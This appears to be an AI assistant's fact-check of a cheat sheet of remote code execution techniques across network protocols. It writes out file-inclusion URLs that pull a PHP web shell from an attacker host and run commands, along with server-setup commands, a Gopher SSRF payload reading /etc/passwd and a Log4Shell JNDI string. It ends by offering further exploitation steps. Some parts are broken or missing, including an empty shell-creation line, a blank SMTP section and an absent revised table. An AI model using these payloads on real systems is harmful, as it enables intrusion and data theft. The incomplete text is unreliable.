4a. RCE

Fact-Check

1. HTTP (80/443)

• Description: Delivers payload via a web request.

  • Check: Accurate. HTTP is commonly exploited for RCE via Local File Inclusion (LFI) or Remote File Inclusion (RFI).

• Example Exploit Command:

  • echo '' > shell.php (creates a PHP web shell).

  • sudo python3 -m http.server <LISTEN_PORT> (serves the shell).

  • Check: Correct. This sets up a simple HTTP server to deliver the malicious file.

• Exploitation URL:

  • http://<TARGET_IP>/index.php?language=http://<ATTACKER_IP>:8081/shell.php&cmd=id

  • Check: Valid for RFI if the target allows remote file inclusion (e.g., allow_url_include=On in PHP). The cmd=id executes the id command via the shell.

• Status: Accurate. Classic RFI example.

2. FTP (21)

• Description: Loads a malicious file via FTP.

  • Check: Accurate. FTP can be used in RFI attacks if the target supports ftp:// URLs.

• Example Exploit Command:

  • sudo python -m pyftpdlib -p 21

  • Check: Correct. pyftpdlib is a Python FTP server; -p 21 sets it to listen on port 21. Assumes shell.php is in the current directory.

• Exploitation URL:

  • http://<TARGET_IP>/index.php?language=ftp://<ATTACKER_IP>/shell.php&cmd=id

  • Check: Valid for RFI with FTP support in PHP (ftp:// wrapper enabled). Executes the shell if included.

• Status: Accurate. Feasible with RFI vulnerability.

3. SMB (445)

• Description: Exploits file inclusion via SMB share.

  • Check: Accurate. SMB can be abused for LFI/RFI if the target supports UNC paths (e.g., Windows environments).

• Example Exploit Command:

  • impacket-smbserver -smb2support share $(pwd)

  • Check: Correct. impacket-smbserver sets up an SMB share; -smb2support ensures modern compatibility. Shares the current directory ($(pwd)).

• Exploitation URL:

  • http://<TARGET_IP>/index.php?language=\<ATTACKER_IP>\share\shell.php&cmd=whoami

  • Check: Valid for Windows targets with SMB inclusion enabled (e.g., file:// or UNC paths). Executes whoami if the shell is included.

• Status: Accurate. Works in specific contexts (Windows, permissive configs).

4. TFTP (69)

• Description: Transfers a malicious script via TFTP.

  • Check: Accurate but niche. TFTP is lightweight and UDP-based, used for file transfers in RFI scenarios.

• Example Exploit Command:

  • atftp --put shell.php -r shell.php <TARGET_IP>

  • Check: Incorrect syntax. atftp uses --put to upload, but -r shell.php specifies a remote file, and it’s meant to send to <TARGET_IP>. Correct usage would be atftp -p -l shell.php -r shell.php <TARGET_IP>, assuming a TFTP server runs on the target. For an attacker serving the file, a TFTP server like tftpd is needed (e.g., sudo tftpd -L -p 69).

• Exploitation URL:

  • http://<TARGET_IP>/index.php?language=tftp://<ATTACKER_IP>/shell.php&cmd=id

  • Check: Valid if the target supports tftp:// (rare, requires custom wrappers or misconfigs). Executes id if included.

• Status: Mostly Accurate. Command needs correction; concept is sound but rare.

5. Gopher

• Description: Abuses gopher:// to trigger SSRF/RCE.

  • Check: Accurate. Gopher is a known SSRF vector, occasionally leading to RCE via backend exploitation (e.g., MySQL).

• Example Exploit Command:

  • gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')

  • Check: Partially correct. This is an SSRF payload targeting MySQL (port 3306), not direct RCE. It’s a URL, not a command to execute locally. A tool like curl would send it: curl "gopher://<TARGET_IP>:3306/_%00SELECT%20load_file('/etc/passwd')". RCE depends on further exploitation (e.g., writing a file).

• Exploitation URL:

  • "Used for SSRF, sometimes leading to RCE"

  • Check: Accurate. Gopher is primarily SSRF; RCE is indirect (e.g., via database or service abuse).

• Status: Accurate. Description fits; command is an example payload, not a local command.

6. LDAP (389)

• Description: Injects LDAP queries for RCE.

  • Check: Partially accurate. LDAP itself doesn’t directly execute code; RCE typically comes from misconfigured apps (e.g., Log4j) or LDAP injection leading to backend exploits.

• Example Exploit Command:

  • ldapsearch -x -H ldap://<TARGET_IP> -D "cn=admin,dc=example,dc=com" -w password

  • Check: Correct syntax for querying LDAP, but it’s reconnaissance, not RCE. RCE via LDAP often requires a vulnerable app (e.g., Log4Shell: ${jndi:ldap://<ATTACKER_IP>/a}).

• Exploitation URL:

  • "Exploits LDAP misconfigurations"

  • Check: Vague but true. RCE depends on app-level vulnerabilities, not LDAP alone.

• Status: Partially Accurate. RCE claim is overstated; needs context (e.g., Log4j).

7. DNS (53)

• Description: Transfers payload via DNS query.

  • Check: Misleading. DNS is typically for exfiltration (e.g., tunneling data in TXT records), not RCE.

• Example Exploit Command:

  • dig @<TARGET_IP> example.com TXT

  • Check: Correct for querying DNS, but it’s not an RCE payload—just a lookup.

• Exploitation URL:

  • "Often used for data exfiltration"

  • Check: Accurate. DNS isn’t a direct RCE vector; it’s for data leakage.

• Status: Inaccurate for RCE. Should clarify it’s exfiltration, not execution.

8. NFS (2049)

• Description: Mounts remote directories to execute a payload.

  • Check: Accurate. NFS can expose files for execution if misconfigured.

• Example Exploit Command:

  • mount -t nfs <TARGET_IP>:/exports /mnt/nfs

  • Check: Correct. Mounts an NFS share; assumes attacker has a payload in the share and executes it locally or via LFI.

• Exploitation URL:

  • "Execute payload inside the NFS share"

  • Check: Valid if combined with LFI (e.g., file:///mnt/nfs/shell.php).

• Status: Accurate. Feasible with additional steps.

9. WebDAV (80/443)

• Description: Uploads and executes a web shell via WebDAV.

  • Check: Accurate. WebDAV allows file uploads, exploitable if execution is permitted.

• Example Exploit Command:

  • cadaver http://<TARGET_IP>/webdav

  • Check: Correct. cadaver is a WebDAV client; user must then put shell.php manually (not shown).

• Exploitation URL:

  • "Upload shell: PUT shell.php"

  • Check: Accurate. WebDAV PUT uploads the shell; execution depends on server config.

• Status: Accurate. Command assumes follow-up action.

10. IMAP (143/993)

• Description: Injects commands via email attachment.

  • Check: Partially accurate. IMAP itself doesn’t execute code; RCE requires a vulnerable email client/server processing attachments.

• Example Exploit Command:

  • openssl s_client -connect <TARGET_IP>:143 -quiet

  • Check: Correct for connecting to IMAP, but no payload is shown. RCE would need a crafted email (e.g., via SMTP first).

• Exploitation URL:

  • "Send payload via IMAP command"

  • Check: Misleading. IMAP retrieves email; payload must be pre-delivered (e.g., via SMTP).

• Status: Partially Accurate. Needs clarification on delivery method.

11. SMTP (25/587)

Example Exploit Command:

Issues Found

1. TFTP: Command syntax incorrect (atftp usage); needs a TFTP server setup instead.

2. Gopher: Command is a payload URL, not a local command; RCE is indirect.

3. LDAP: Overstates RCE; typically requires app-level vuln (e.g., Log4j).

4. DNS: Not RCE; should be labeled as exfiltration only.

5. IMAP: Misleading; RCE requires prior payload delivery (e.g., SMTP).

6. SMTP: RCE overstated; depends on vulnerable email processing.

Revised Table

Here’s a corrected version with clarifications:

Final Verdict

• Accuracy: Mostly correct; some entries overstate RCE (DNS, LDAP, IMAP, SMTP) or have minor command issues (TFTP, Gopher).

• Feasibility: All are plausible with vulnerable targets; clarified dependencies (e.g., app vulns for LDAP).

• Corrections: Adjusted descriptions and commands for precision.

The table is solid with minor refinements. Let me know if you want detailed exploitation steps for any protocol!